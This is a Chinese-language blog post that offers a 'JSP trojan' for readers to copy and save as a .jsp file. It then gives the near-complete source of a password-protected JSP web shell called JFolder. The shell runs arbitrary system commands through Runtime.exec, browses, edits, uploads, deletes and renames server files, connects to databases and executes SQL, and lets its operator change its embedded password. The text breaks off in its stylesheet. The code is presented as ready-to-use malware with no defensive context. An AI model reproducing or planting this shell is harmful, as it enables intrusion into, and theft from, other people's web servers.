`
seawavenews
  • 浏览: 231354 次
  • 性别: Icon_minigender_1
  • 来自: 杭州
文章分类
社区版块
存档分类
最新评论
阅读更多

一款不错的 JSP 木马。大家复制下面的内容。然后另存为 JSP 格式就可以拉。

<%@ page contentType="text/html; charset=GBK" %>
<%@ page import="java.io.*"%>
<%@ page import="java.util.Map"%>
<%@ page import="java.util.HashMap"%>
<%@ page import="java.nio.charset.Charset"%>
<%@ page import="java.util.regex.*"%>
<%@ page import="java.sql.*"%>
<%!
private String _password = "520520";
private String _encodeType = "GB2312";
private int _sessionOutTime = 20;
private String[] _textFileTypes = {"txt", "htm", "html", "asp", "jsp", "java", "js", "css", "c", "cpp", "sh", "pl", "cgi", "php", "conf", "xml", "xsl", "ini", "vbs", "inc"};
private Connection _dbConnection = null;
private Statement _dbStatement = null;
private String _url = null;

public boolean validate(String password) {
 if (password.equals(_password)) {
  return true;
 } else {
  return false;
 }
}

public String HTMLEncode(String str) {
 str = str.replaceAll(" ", "&nbsp;");
 str = str.replaceAll("<", "&lt;");
 str = str.replaceAll(">", "&gt;");
 str = str.replaceAll("\r\n", "<br>");
 
 return str;
}

public String Unicode2GB(String str) {
 String sRet = null;
 
 try {
  sRet = new String(str.getBytes("ISO8859_1"), _encodeType);
 } catch (Exception e) {
  sRet = str;
 }
 
 return sRet;
}

public String exeCmd(String cmd) {
 Runtime runtime = Runtime.getRuntime();
 Process proc = null;
 String retStr = "";
 InputStreamReader insReader = null;
 char[] tmpBuffer = new char[1024];
 int nRet = 0;
 
 try {
  proc = runtime.exec(cmd);
  insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB2312"));
 
  while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) {
   retStr += new String(tmpBuffer, 0, nRet);
  }
 
  insReader.close();
  retStr = HTMLEncode(retStr);
 } catch (Exception e) {
  retStr = "<font color=\"red\">bad command \"" + cmd + "\"</font>";
 } finally {
  return retStr;
 }
}

public String pathConvert(String path) {
 String sRet = path.replace('\\', '/');
 File file = new File(path);
 
 if (file.getParent() != null) {
  if (file.isDirectory()) {
   if (! sRet.endsWith("/"))
    sRet += "/";
  }
 } else {
  if (! sRet.endsWith("/"))
   sRet += "/";
 }
 
 return sRet;
}

public String strCut(String str, int len) {
 String sRet;
 
 len -= 3;
 
 if (str.getBytes().length <= len) {
  sRet = str;
 } else {
  try {
   sRet = (new String(str.getBytes(), 0, len, "GBK")) + "...";
  } catch (Exception e) {
   sRet = str;
  }
 }
 
 return sRet;
}

public String listFiles(String path, String curUri) {
 File[] files = null;
 File curFile = null;
 String sRet = null;
 int n = 0;
 boolean isRoot = path.equals("");
 
 path = pathConvert(path);
 
 try {
  if (isRoot) {
   files = File.listRoots();
  } else {
   try {
    curFile = new File(path);
    String[] sFiles = curFile.list();
    files = new File[sFiles.length];
    
    for (n = 0; n < sFiles.length; n ++) {
     files[n] = new File(path + sFiles[n]);
    }
   } catch (Exception e) {
    sRet = "<font color=\"red\">bad path \"" + path + "\"</font>";
   }
  }
 
  if (sRet == null) {
   sRet = "\n";
   sRet += "<script language=\"javascript\">\n";
   sRet += "var selectedFile = null;\n";
   sRet += "<!--\n";
   sRet += "function createFolder() {\n";
   sRet += " var folderName = prompt(\"请输入目录名\", \"\");\n";
   sRet += " if (folderName != null && folderName != false && ltrim(folderName) != \"\") {\n";
   sRet += "  window.location.href = \"" + curUri + "&curPath=" + path + "&fsAction=createFolder&folderName=\" + folderName + \"" + "\";\n";
   sRet += " }\n";
   sRet += "}\n";
   sRet += "\n";
   sRet += "function createFile() {\n";
   sRet += " var fileName = prompt(\"请输入文件名\", \"\");\n";
   sRet += " if (fileName != null && fileName != false && ltrim(fileName) != \"\") {\n";
   sRet += "  window.location.href = \"" + curUri + "&curPath=" + path + "&fsAction=createFile&fileName=\" + fileName + \"" + "\";\n";
   sRet += " }\n";
   sRet += "}\n";
   sRet += "\n";
   sRet += "function selectFile(obj) {\n";
   sRet += " if (selectedFile != null)\n";
   sRet += "  selectedFile.style.backgroundColor = \"#FFFFFF\";\n";
   sRet += " selectedFile = obj;\n";
   sRet += " obj.style.backgroundColor = \"#CCCCCC\";\n";
   sRet += "}\n";
   sRet += "\n";
   sRet += "function change(obj) {\n";
   sRet += " if (selectedFile != obj)\n";
   sRet += "  obj.style.backgroundColor = \"#CCCCCC\";\n";
   sRet += "}\n";
   sRet += "\n";
   sRet += "function restore(obj) {\n";
   sRet += " if (selectedFile != obj)\n";
   sRet += "  obj.style.backgroundColor = \"#FFFFFF\";\n";
   sRet += "}\n";
   sRet += "\n";
   sRet += "function showUpload() {\n";
   sRet += " up.style.visibility = \"visible\";\n";
   sRet += "}\n";
   sRet += "\n";
   sRet += "function copyFile() {\n";
   sRet += " var toPath = prompt(\"请输入要复制到的目录(绝对路径)\", \"\");\n";
   sRet += " if (toPath != null && toPath != false && ltrim(toPath) != \"\") {\n";
   sRet += "  document.fileList.action = \"" + curUri + "&curPath=" + path + "&fsAction=copyto&dstPath=" + "\" + toPath;\n";
   sRet += "  document.fileList.submit();\n";
   sRet += " }\n";
   sRet += "}\n";
   sRet += "\n";
   sRet += "function rename() {\n";
   sRet += " var count = 0;\n";
   sRet += " var selected = -1;\n";
   sRet += " for (var i = 0; i < document.fileList.filesDelete.length; i ++) {\n";
   sRet += "  if (document.fileList.filesDelete[i].checked) {\n";
   sRet += "   count ++;\n";
   sRet += "   selected = i;\n";
   sRet += "  }\n";
   sRet += " }\n";
   sRet += " if (count > 1)\n";
   sRet += "  alert(\"不能重命名多个文件\");\n";
   sRet += " else if (selected == -1)\n";
   sRet += "  alert(\"没有选中要重命名的文件\");\n";
   sRet += " else {\n";
   sRet += "  var newName = prompt(\"请输入新文件名\", \"\");\n";
   sRet += "  if (newName != null && newName != false && ltrim(newName) != \"\") {\n";
   sRet += "   window.location.href = \"" + curUri + "&curPath=" + path + "&fsAction=rename&newName=\" + newName + \"&fileRename=\" + document.fileList.filesDelete[selected].value;";
   sRet += "  }\n";
   sRet += " }\n";
   sRet += "}\n";
   sRet += "\n";
   sRet += "//-->\n";
   sRet += "</script>\n";
   sRet += "<table width=\"100%\" border=\"0\" cellpadding=\"2\" cellpadding=\"1\">\n";
   sRet += " <form enctype=\"multipart/form-data\" method=\"post\" name=\"upload\" action=\"" + curUri + "&curPath=" + path + "&fsAction=upload" + "\">\n";
  
   if (curFile != null) {
    sRet += " <tr>\n";
    sRet += "  <td colspan=\"4\" valign=\"middle\">\n";
    sRet += "   &nbsp;<a href=\"" + curUri + "&curPath=" + (curFile.getParent() == null ? "" : pathConvert(curFile.getParent())) + "\">上级目录</a>&nbsp;";
    sRet += "<a href=\"#\" onclick=\"javascript:createFolder()\">创建目录</a>&nbsp;";
    sRet += "<a href=\"#\" onclick=\"javascript:createFile()\">新建文件</a>&nbsp;";
    sRet += "<a href=\"#\" onclick=\"javascript:document.fileList.submit();\">删除</a>&nbsp;";
    sRet += "<a href=\"#\" onclick=\"javascript:copyFile()\">复制</a>&nbsp;";
    sRet += "<a href=\"#\" onclick=\"javascript:rename()\">重命名</a>&nbsp;";
    sRet += "<a href=\"#\" onclick=\"javascript:showUpload()\">上传文件</a>\n";
    sRet += "<span style=\"visibility: hidden\" id=\"up\"><input type=\"file\" value=\"上传\" name=\"upFile\" size=\"8\" class=\"textbox\" />&nbsp;<input type=\"submit\" value=\"上传\" class=\"button\"></span>\n";
    sRet += "  </td>\n";
    sRet += " </tr>\n";
   }
  
   sRet += "</form>\n";
  
   sRet += " <form name=\"fileList\" method=\"post\" action=\"" + curUri + "&curPath=" + path + "&fsAction=deleteFile" + "\">\n";
  
   for (n = 0; n < files.length; n ++) {
    sRet += " <tr onclick=\"javascript: selectFile(this)\" onmouseover=\"javascript: change(this)\" onmouseout=\"javascript: restore(this)\" style=\"cursor:hand;\">\n";
   
    if (! isRoot) {
     sRet += "  <td width=\"5%\" align=\"center\"><input type=\"checkbox\" name=\"filesDelete\" value=\"" + pathConvert(files[n].getPath()) + "\" /></td>\n";
     if (files[n].isDirectory()) {
      sRet += "  <td><a href=\"" + curUri + "&curPath=" + pathConvert(files[n].getPath()) + "\" title=\"" + files[n].getName() + "\">&lt;" + strCut(files[n].getName(), 50) + "&gt;</a></td>\n";
     } else {
      sRet += "  <td><a title=\"" + files[n].getName() + "\">" + strCut(files[n].getName(), 50) + "</a></td>\n";
     }
    
     sRet += "  <td width=\"15%\" align=\"center\">" + (files[n].isDirectory() ? "&lt;dir&gt;" : "") + ((! files[n].isDirectory()) && isTextFile(getExtName(files[n].getPath())) ? "<<a href=\"" + curUri + "&curPath=" + pathConvert(files[n].getPath()) + "&fsAction=open" + "\">edit</a>>" : "") + "</td>\n";
     sRet += "  <td width=\"15%\" align=\"center\">" + files[n].length() + "</td>\n";
    } else {
     sRet += "  <td><a href=\"" + curUri + "&curPath=" + pathConvert(files[n].getPath()) + "\" title=\"" + files[n].getName() + "\">" + pathConvert(files[n].getPath()) + "</a></td>\n";
    }
 
    sRet += " </tr>\n";
   }
   sRet += " </form>\n";
   sRet += "</table>\n";
  }
 } catch (SecurityException e) {
  sRet = "<font color=\"red\">security violation, no privilege.</font>";
 }
 
 return sRet;
}

public boolean isTextFile(String extName) {
 int i;
 boolean bRet = false;
 
 if (! extName.equals("")) {
  for (i = 0; i < _textFileTypes.length; i ++) {
   if (extName.equals(_textFileTypes[i])) {
    bRet = true;
    break;
   }
  }
 } else {
  bRet = true;
 }
 
 return bRet;
}

public String getExtName(String fileName) {
 String sRet = "";
 int nLastDotPos;
 
 fileName = pathConvert(fileName);
 
 nLastDotPos = fileName.lastIndexOf(".");
 
 if (nLastDotPos == -1) {
  sRet = "";
 } else {
  sRet = fileName.substring(nLastDotPos + 1);
 }
 
 return sRet;
}

public String browseFile(String path) {
 String sRet = "";
 File file = null;
 FileReader fileReader = null;
 
 path = pathConvert(path);
 
 try {
  file = new File(path);
  fileReader = new FileReader(file);
  String fileString = "";
  char[] chBuffer = new char[1024];
  int ret;
 
  sRet = "<script language=\"javascript\">\n";
 
  while ((ret = fileReader.read(chBuffer, 0, 1024)) != -1) {
   fileString += new String(chBuffer, 0, ret);
  }
 
  sRet += "var wnd = window.open(\"about:blank\", \"_blank\", \"width=600, height=500\");\n";
  sRet += "var doc = wnd.document;\n";
  sRet += "doc.write(\"" + "aaa" + "\");\n";
 
  sRet += "</script>\n";
 
 } catch (IOException e) {
  sRet += "<script language=\"javascript\">\n";
  sRet += "alert(\"打开文件" + path + "失败\");\n";
  sRet += "</script>\n";
 }
 
 return sRet;
}

public String openFile(String path, String curUri) {
 String sRet = "";
 boolean canOpen = false;
 int nLastDotPos = path.lastIndexOf(".");
 String extName = "";
 String fileString = null;
 File curFile = null;
 
 path = pathConvert(path);
 
 if (nLastDotPos == -1) {
  canOpen = true;
 } else {
  extName = path.substring(nLastDotPos + 1);
  canOpen = isTextFile(extName);
 }
 
 if (canOpen) {
  try {
   fileString = "";
   curFile = new File(path);
   FileReader fileReader = new FileReader(curFile);
   char[] chBuffer = new char[1024];
   int nRet;
  
   while ((nRet = fileReader.read(chBuffer, 0, 1024)) != -1) {
    fileString += new String(chBuffer, 0, nRet);
   }
  
   fileReader.close();
  } catch (IOException e) {
   fileString = null;
   sRet = "<font color=\"red\">不能打开文件\"" + path + "\"</font>";
  } catch (SecurityException e) {
   fileString = null;
   sRet = "<font color=\"red\">安全问题,没有权限执行该操作</font>";
  }
 } else {
  sRet = "<font color=\"red\">file \"" + path + "\" is not a text file, can't be opened in text mode</font>";
 }
 
 if (fileString != null) {
  sRet += "<script language=\"javascript\">";
  sRet += "<!--\n";
  sRet += "function saveAs() {\n";
  sRet += " var fileName = prompt(\"请输入文件名\", \"\");\n";
  sRet += " if (fileName != null && fileName != false && ltrim(fileName) != \"\") {\n";
  sRet += "  document.openfile.action=\"" + curUri + "&curPath=" + pathConvert(curFile.getParent()) + "\" + fileName + \"&fsAction=saveAs\";\n";
  sRet += "  document.openfile.submit();\n";
  sRet += " }\n";
  sRet += "}\n";
  sRet += "//-->\n";
  sRet += "</script>\n";
  sRet += "<table align=\"center\" width=\"100%\" cellpadding=\"2\" cellspacing=\"1\">\n";
  sRet += " <form name=\"openfile\" method=\"post\" action=\"" + curUri + "&curPath=" + path + "&fsAction=save" + "\">\n";
  sRet += " <tr>\n";
  sRet += "  <td>[<a href=\"" + curUri + "&curPath=" + pathConvert(curFile.getParent()) + "\">上级目录</a>]</td>\n";
  sRet += " </tr>\n";
  sRet += " <tr>\n";
  sRet += "  <td align=\"center\">\n";
  sRet += "   <textarea name=\"fileContent\" cols=\"80\" rows=\"32\">\n";
  sRet += fileString;
  sRet += "   </textarea>\n";
  sRet += "  </td>\n";
  sRet += " </tr>\n";
  sRet += " <tr>\n";
  sRet += "  <td align=\"center\"><input type=\"submit\" class=\"button\" value=\"保存\" />&nbsp;<input type=\"button\" class=\"button\" value=\"另存为\" onclick=\"javascript:saveAs()\" /></td>\n";
  sRet += " </tr>\n";
  sRet += " </form>\n";
  sRet += "</table>\n";
 }
 
 return sRet;
}

public String saveFile(String path, String curUri, String fileContent) {
 String sRet = "";
 File file = null;
 
 path = pathConvert(path);
 
 try {
  file = new File(path);
 
  if (! file.canWrite()) {
   sRet = "<font color=\"red\">文件不可写</font>";
  } else {
   FileWriter fileWriter = new FileWriter(file);
   fileWriter.write(fileContent);
  
   fileWriter.close();
   sRet = "文件保存成功,正在返回,请稍候……\n";
   sRet += "<meta http-equiv=\"refresh\" content=\"2;url=" + curUri + "&curPath=" + path + "&fsAction=open" + "\" />\n";
  }
 } catch (IOException e) {
  sRet = "<font color=\"red\">保存文件失败</font>";
 } catch (SecurityException e) {
  sRet = "<font color=\"red\">安全问题,没有权限执行该操作</font>";
 }
 
 return sRet;
}

public String createFolder(String path, String curUri, String folderName) {
 String sRet = "";
 File folder = null;
 
 path = pathConvert(path);
 
 try {
  folder = new File(path + folderName);
 
  if (folder.exists() && folder.isDirectory()) {
   sRet = "<font color=\"red\">\"" + path + folderName + "\"目录已经存在</font>";
  } else {
   if (folder.mkdir()) {
    sRet = "成功创建目录\"" + pathConvert(folder.getPath()) + "\",正在返回,请稍候……\n";
     sRet += "<meta http-equiv=\"refresh\" content=\"2;url=" + curUri + "&curPath=" + path + folderName + "\" />";
   } else {
    sRet = "<font color=\"red\">创建目录\"" + folderName + "\"失败</font>";
   }
  }
 } catch (SecurityException e) {
  sRet = "<font color=\"red\">安全问题,没有权限执行该操作</font>";
 }
 
 return sRet;
}

public String createFile(String path, String curUri, String fileName) {
 String sRet = "";
 File file = null;
 
 path = pathConvert(path);
 
 try {
  file = new File(path + fileName);
 
  if (file.createNewFile()) {
   sRet = "<meta http-equiv=\"refresh\" content=\"0;url=" + curUri + "&curPath=" + path + fileName + "&fsAction=open" + "\" />";
  } else {
   sRet = "<font color=\"red\">\"" + path + fileName + "\"文件已经存在</font>";
  }
 } catch (SecurityException e) {
  sRet = "<font color=\"red\">安全问题,没有权限执行该操作</font>";
 } catch (IOException e) {
  sRet = "<font color=\"red\">创建文件\"" + path + fileName + "\"失败</font>";
 }
 
 return sRet;
}

public String deleteFile(String path, String curUri, String[] files2Delete) {
 String sRet = "";
 File tmpFile = null;
 
 try {
  for (int i = 0; i < files2Delete.length; i ++) {
   tmpFile = new File(files2Delete[i]);
   if (! tmpFile.delete()) {
    sRet += "<font color=\"red\">删除\"" + files2Delete[i] + "\"失败</font><br>\n";
   }
  }
 
  if (sRet.equals("")) {
   sRet = "删除成功,正在返回,请稍候……\n";
   sRet += "<meta http-equiv=\"refresh\" content=\"2;url=" + curUri + "&curPath=" + path + "\" />";
  }
 } catch (SecurityException e) {
  sRet = "<font color=\"red\">安全问题,没有权限执行该操作</font>\n";
 }
 
 return sRet;
}

public String saveAs(String path, String curUri, String fileContent) {
 String sRet = "";
 File file = null;
 FileWriter fileWriter = null;
 
 try {
  file = new File(path);
 
  if (file.createNewFile()) {
   fileWriter = new FileWriter(file);
   fileWriter.write(fileContent);
   fileWriter.close();
  
   sRet = "<meta http-equiv=\"refresh\" content=\"0;url=" + curUri + "&curPath=" + path + "&fsAction=open" + "\" />";
  } else {
   sRet = "<font color=\"red\">文件\"" + path + "\"已经存在</font>";
  }
 } catch (IOException e) {
  sRet = "<font color=\"red\">创建文件\"" + path + "\"失败</font>";
 }
 
 return sRet;
}


public String uploadFile(ServletRequest request, String path, String curUri) {
 String sRet = "";
 File file = null;
 InputStream in = null;
 
 path = pathConvert(path);
 
 try {
  in = request.getInputStream();
 
  byte[] inBytes = new byte[request.getContentLength()];
  int nBytes;
  int start = 0;
  int end = 0;
  int size = 1024;
  String token = null;
  String filePath = null;

  //
  // 把输入流读入一个字节数组
  //
  while ((nBytes = in.read(inBytes, start, size)) != -1) {
   start += nBytes;
  }
 
  in.close();
  //
  // 从字节数组中得到文件分隔符号
  //
  int i = 0;
  byte[] seperator;
 
  while (inBytes[i] != 13) {
   i ++;
  }
 
  seperator =  new byte[i];
 
  for (i = 0; i < seperator.length; i ++) {
   seperator[i] = inBytes[i];
  }
 
  //
  // 得到Header部分
  //
  String dataHeader = null;
  i += 3;
  start = i;
  while (! (inBytes[i] == 13 && inBytes[i + 2] == 13)) {
   i ++;
  }
  end = i - 1;
  dataHeader = new String(inBytes, start, end - start + 1);
 
  //
  // 得到文件名
  //
  token = "filename=\"";
  start = dataHeader.indexOf(token) + token.length();
  token = "\"";
  end = dataHeader.indexOf(token, start) - 1;
  filePath = dataHeader.substring(start, end + 1);
  filePath =  pathConvert(filePath);
  String fileName = filePath.substring(filePath.lastIndexOf("/") + 1);
 
  //
  // 得到文件内容开始位置
  //
  i += 4;
  start = i;
 
  /*
  boolean found = true; 
  byte[] tmp = new byte[seperator.length];
  while (i <= inBytes.length - 1 - seperator.length) {
 
   for (int j = i; j < i + seperator.length; j ++) {
    if (seperator[j - i] != inBytes[j]) {
     found = false;
     break;
    } else
     tmp[j - i] = inBytes[j];
   }
  
   if (found)
    break;
  
   i ++;
  }*/
 
  //
  // 偷懒的办法
  //
  end = inBytes.length - 1 - 2 - seperator.length - 2 - 2;
 
  //
  // 保存为文件
  //
  File newFile = new File(path + fileName);
  newFile.createNewFile();
  FileOutputStream out = new FileOutputStream(newFile);
 
  //out.write(inBytes, start, end - start + 1);
  out.write(inBytes, start, end - start + 1);
  out.close();
 
  sRet = "<script language=\"javascript\">\n";
  sRet += "alert(\"文件上传成功" + fileName + "\");\n";
  sRet += "</script>\n";
 } catch (IOException e) {
  sRet = "<script language=\"javascript\">\n";
  sRet += "alert(\"文件上传失败\");\n";
  sRet += "</script>\n";
 }
 
 sRet += "<meta http-equiv=\"refresh\" content=\"0;url=" + curUri + "&curPath=" + path + "\" />";
 return sRet;
}

public boolean fileCopy(String srcPath, String dstPath) {
 boolean bRet = true;
 
 try {
  FileInputStream in = new FileInputStream(new File(srcPath));
  FileOutputStream out = new FileOutputStream(new File(dstPath));
  byte[] buffer = new byte[1024];
  int nBytes;
 

  while ((nBytes = in.read(buffer, 0, 1024)) != -1) {
   out.write(buffer, 0, nBytes);
  }
 
  in.close();
  out.close();
 } catch (IOException e) {
  bRet = false;
 }
 
 return bRet;
}

public String getFileNameByPath(String path) {
 String sRet = "";
 
 path = pathConvert(path);
 
 if (path.lastIndexOf("/") != -1) {
  sRet = path.substring(path.lastIndexOf("/") + 1);
 } else {
  sRet = path;
 }
 
 return sRet;
}

public String copyFiles(String path, String curUri, String[] files2Copy, String dstPath) {
 String sRet = "";
 int i;
 
 path = pathConvert(path);
 dstPath = pathConvert(dstPath);
 
 for (i = 0; i < files2Copy.length; i ++) {
  if (! fileCopy(files2Copy[i], dstPath + getFileNameByPath(files2Copy[i]))) {
   sRet += "<font color=\"red\">文件\"" + files2Copy[i] + "\"复制失败</font><br/>";
  }
 }
 
 if (sRet.equals("")) {
  sRet = "文件复制成功,正在返回,请稍候……";
  sRet += "<meta http-equiv=\"refresh\" content=\"2;url=" + curUri + "&curPath=" + path + "\" />";
 }
 
 return sRet;
}

public boolean isFileName(String fileName) {
 boolean bRet = false;
 
 Pattern p = Pattern.compile("^[a-zA-Z0-9][\\w\\.]*[\\w]$");
 Matcher m = p.matcher(fileName);
 
 bRet = m.matches();
 
 return bRet;
}

public String renameFile(String path, String curUri, String file2Rename, String newName) {
 String sRet = "";
 
 path = pathConvert(path);
 file2Rename = pathConvert(file2Rename);
 
 try {
  File file = new File(file2Rename);
 
  newName = file2Rename.substring(0, file2Rename.lastIndexOf("/") + 1) + newName;
  File newFile = new File(newName);
 
  if (! file.exists()) {
   sRet = "<font color=\"red\">文件\"" + file2Rename + "\"不存在</font>";
  } else {
   file.renameTo(newFile);
   sRet = "文件重命名成功,正在返回,请稍候……";
   sRet += "<meta http-equiv=\"refresh\" content=\"2;url=" + curUri + "&curPath=" + path + "\" />";
  }
 } catch (SecurityException e) {
  sRet = "<font color=\"red\">安全问题导致文件\"" + file2Rename + "\"复制失败</font>";
 }
 
 return sRet;
}

public boolean DBInit(String dbType, String dbServer, String dbPort, String dbUsername, String dbPassword, String dbName) {
 boolean bRet = true;
 String driverName = "";
 
 if (dbServer.equals(""))
  dbServer = "localhost";
 
 try {
  if (dbType.equals("sqlserver")) {
   driverName = "com.microsoft.jdbc.sqlserver.SQLServerDriver";
   if (dbPort.equals(""))
    dbPort = "1433";
   _url = "jdbc:microsoft:sqlserver://" + dbServer + ":" + dbPort + ";User=" + dbUsername + ";Password=" + dbPassword + ";DatabaseName=" + dbName;
  } else if (dbType.equals("mysql")) {
   driverName = "com.mysql.jdbc.Driver";
   if (dbPort.equals(""))
    dbPort = "3306";
   _url = "jdbc:mysql://" + dbServer + ":" + dbPort + ";User=" + dbUsername + ";Password=" + dbPassword + ";DatabaseName=" + dbName;
  } else if (dbType.equals("odbc")) {
   driverName = "sun.jdbc.odbc.JdbcOdbcDriver";
   _url = "jdbc:odbc:dsn=" + dbName + ";User=" + dbUsername + ";Password=" + dbPassword;
  } else if (dbType.equals("oracle")) {
   driverName = "oracle.jdbc.driver.OracleDriver";
   _url = "jdbc:oracle:thin@" + dbServer + ":" + dbPort + ":" + dbName;
  } else if (dbType.equals("db2")) {
   driverName = "com.ibm.db2.jdbc.app.DB2Driver";
   _url = "jdbc:db2://" + dbServer + ":" + dbPort + "/" + dbName;
  }
 
  Class.forName(driverName);
 } catch (ClassNotFoundException e) {
  bRet = false;
 }
 
 return bRet;
}

public boolean DBConnect(String User, String Password) {
 boolean bRet = false;
 
 if (_url != null) {
  try {
   _dbConnection = DriverManager.getConnection(_url, User, Password);
   _dbStatement = _dbConnection.createStatement();
   bRet = true;
  } catch (SQLException e) {
   bRet = false;
  }
 }
 
 return bRet;
}

public String DBExecute(String sql) {
 String sRet = "";
 
 if (_dbConnection == null || _dbStatement == null) {
  sRet = "<font color=\"red\">数据库没有正常连接</font>";
 } else {
  try {
   if (sql.toLowerCase().substring(0, 6).equals("select")) {
    ResultSet rs = _dbStatement.executeQuery(sql);
    ResultSetMetaData rsmd = rs.getMetaData();
    int colNum = rsmd.getColumnCount();
    int colType;
   
    sRet = "sql语句执行成功,返回结果<br>\n";
    sRet += "<table align=\"center\" border=\"0\" bgcolor=\"#CCCCCC\" cellpadding=\"2\" cellspacing=\"1\">\n";
    sRet += "    <tr bgcolor=\"#FFFFFF\">\n";
    for (int i = 1; i <= colNum; i ++) {
     sRet += "        <th>" + rsmd.getColumnName(i) + "(" + rsmd.getColumnTypeName(i) + ")</th>\n";
    }
    sRet += "    </tr>\n";
    while (rs.next()) {
     sRet += " <tr bgcolor=\"#FFFFFF\">\n";
     for (int i = 1; i <= colNum; i ++) {
      colType = rsmd.getColumnType(i);
     
      sRet += "  <td>";
      switch (colType) {
       case Types.BIGINT:
       sRet += rs.getLong(i);
       break;
      
       case Types.BIT:
       sRet += rs.getBoolean(i);
       break;
      
       case Types.BOOLEAN:
       sRet += rs.getBoolean(i);
       break;
      
       case Types.CHAR:
       sRet += rs.getString(i);
       break;
      
       case Types.DATE:
       sRet += rs.getDate(i).toString();
       break;
      
       case Types.DECIMAL:
       sRet += rs.getDouble(i);
       break;
      
       case Types.NUMERIC:
       sRet += rs.getDouble(i);
       break;
      
       case Types.REAL:
       sRet += rs.getDouble(i);
       break;
      
       case Types.DOUBLE:
       sRet += rs.getDouble(i);
       break;
      
       case Types.FLOAT:
       sRet += rs.getFloat(i);
       break;
      
       case Types.INTEGER:
       sRet += rs.getInt(i);
       break;
      
       case Types.TINYINT:
       sRet += rs.getShort(i);
       break;
      
       case Types.VARCHAR:
       sRet += rs.getString(i);
       break;
      
       case Types.TIME:
       sRet += rs.getTime(i).toString();
       break;
      
       case Types.DATALINK:
       sRet += rs.getTimestamp(i).toString();
       break;
      }
      sRet += "  </td>\n";
     }
     sRet += " </tr>\n";
    }   
    sRet += "</table>\n";
   
    rs.close();
   } else {
    if (_dbStatement.execute(sql)) {
     sRet = "sql语句执行成功";
    } else {
     sRet = "<font color=\"red\">sql语句执行失败</font>";
    }
   }
  } catch (SQLException e) {
   sRet = "<font color=\"red\">sql语句执行失败</font>";
  }
 }
 
 return sRet;
}

public void DBRelease() {
 try {
  if (_dbStatement != null) {
   _dbStatement.close();
   _dbStatement = null;
  }
 
  if (_dbConnection != null) {
   _dbConnection.close();
   _dbConnection = null;
  }
 } catch (SQLException e) {
 
 }
}

/////////////////////////////////////////////////////////////////////////////////////////////////////////////////

class JshellConfig {
 private String _jshellContent = null;
 private String _path = null;

 public JshellConfig(String path) throws JshellConfigException {
  _path = path;
  read();
 }
 
 private void read() throws JshellConfigException {
  try {
   FileReader jshell = new FileReader(new File(_path));
   char[] buffer = new char[1024];
   int nChars;
   _jshellContent = "";
  
   while ((nChars = jshell.read(buffer, 0, 1024)) != -1) {
    _jshellContent += new String(buffer, 0, nChars);
   }
  
   jshell.close();
  } catch (IOException e) {
   throw new JshellConfigException("打开文件失败");
  }
 }
 
 public void save() throws JshellConfigException {
  FileWriter jshell = null;
 
  try {
   jshell = new FileWriter(new File(_path));
   char[] buffer = _jshellContent.toCharArray();
   int start = 0;
   int size = 1024;
  
   for (start = 0; start < buffer.length - 1 - size; start += size) {
    jshell.write(buffer, start, size);
   }
  
   jshell.write(buffer, start, buffer.length - 1 - start);
  } catch (IOException e) {
   new JshellConfigException("写文件失败");
  } finally {
   try {
    jshell.close();
   } catch (IOException e) {
  
   }
  }
 }
 
 public void setPassword(String password) throws JshellConfigException {
  Pattern p = Pattern.compile("\\w+");
  Matcher m = p.matcher(password);
 
  if (! m.matches()) {
   throw new JshellConfigException("密码不能有除字母数字下划线以外的字符");
  }
 
  p = Pattern.compile("private\\sString\\s_password\\s=\\s\"" + _password + "\"");
  m = p.matcher(_jshellContent);
  if (! m.find()) {
   throw new JshellConfigException("程序体已经被非法修改");
  }
 
  _jshellContent = m.replaceAll("private String _password = \"" + password + "\"");
 
  //return HTMLEncode(_jshellContent);
 }
 
 public void setEncodeType(String encodeType) throws JshellConfigException {
  Pattern p = Pattern.compile("[A-Za-z0-9]+");
  Matcher m = p.matcher(encodeType);
 
  if (! m.matches()) {
   throw new JshellConfigException("编码格式只能是字母和数字的组合");
  }
 
  p = Pattern.compile("private\\sString\\s_encodeType\\s=\\s\"" + _encodeType + "\"");
  m = p.matcher(_jshellContent);
 
  if (! m.find()) {
   throw new JshellConfigException("程序体已经被非法修改");
  }
 
  _jshellContent = m.replaceAll("private String _encodeType = \"" + encodeType + "\"");
  //return HTMLEncode(_jshellContent);
 }
 
 public void setSessionTime(String sessionTime) throws JshellConfigException {
  Pattern p = Pattern.compile("\\d+");
  Matcher m = p.matcher(sessionTime);
 
  if (! m.matches()) {
   throw new JshellConfigException("session超时时间只能填数字");
  }
 
  p = Pattern.compile("private\\sint\\s_sessionOutTime\\s=\\s" + _sessionOutTime);
  m = p.matcher(_jshellContent);
 
  if (! m.find()) {
   throw new JshellConfigException("程序体已经被非法修改");
  }
 
  _jshellContent = m.replaceAll("private int _sessionOutTime = " + sessionTime);
  //return HTMLEncode(_jshellContent);
 }
 
 public void setTextFileTypes(String[] textFileTypes) throws JshellConfigException {
  Pattern p = Pattern.compile("\\w+");
  Matcher m = null;
  int i;
  String fileTypes = "";
  String tmpFileTypes = "";
 
  for (i = 0; i < textFileTypes.length; i ++) {
   m = p.matcher(textFileTypes[i]);
  
   if (! m.matches()) {
    throw new JshellConfigException("扩展名只能是字母数字和下划线的组合");
   }
  
   if (i != textFileTypes.length - 1)
    fileTypes += "\"" + textFileTypes[i] + "\"" + ", ";
   else
    fileTypes += "\"" + textFileTypes[i] + "\"";
  }
 
  for (i = 0; i < _textFileTypes.length; i ++) {
   if (i != _textFileTypes.length - 1)
    tmpFileTypes += "\"" + _textFileTypes[i] + "\"" + ", ";
   else
    tmpFileTypes += "\"" + _textFileTypes[i] + "\"";
  }
 
  p = Pattern.compile(tmpFileTypes);
  m = p.matcher(_jshellContent);
 
  if (! m.find()) {
   throw new JshellConfigException("程序文件已经被非法修改");
  }
 
  _jshellContent = m.replaceAll(fileTypes);
 
  //return HTMLEncode(_jshellContent);
 }
 
 public String getContent() {
  return HTMLEncode(_jshellContent);
 }
}

class JshellConfigException extends Exception {
 public JshellConfigException(String message) {
  super(message);
 }
}
%>
<html>
<head>
<title>JFolder 华夏猪头三修改版</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312"></head>
<style>
body {
 font-size: 14px;
 font-family: 宋体;
 background-color: #CCCCCC;
}
td {
 font-size: 14px;
 font-family: 宋体;
}

input.textbox {
 border: black solid 1;
 font-size: 12px;
 height: 18px;
}

input.button {
 font-size: 12px;
 font-family: 宋体;
 border: black solid 1;
}

td.datarows {
 font-size: 14px;
 font-family: 宋体;
 height: 25px;
}

textarea {
border: black solid 1;
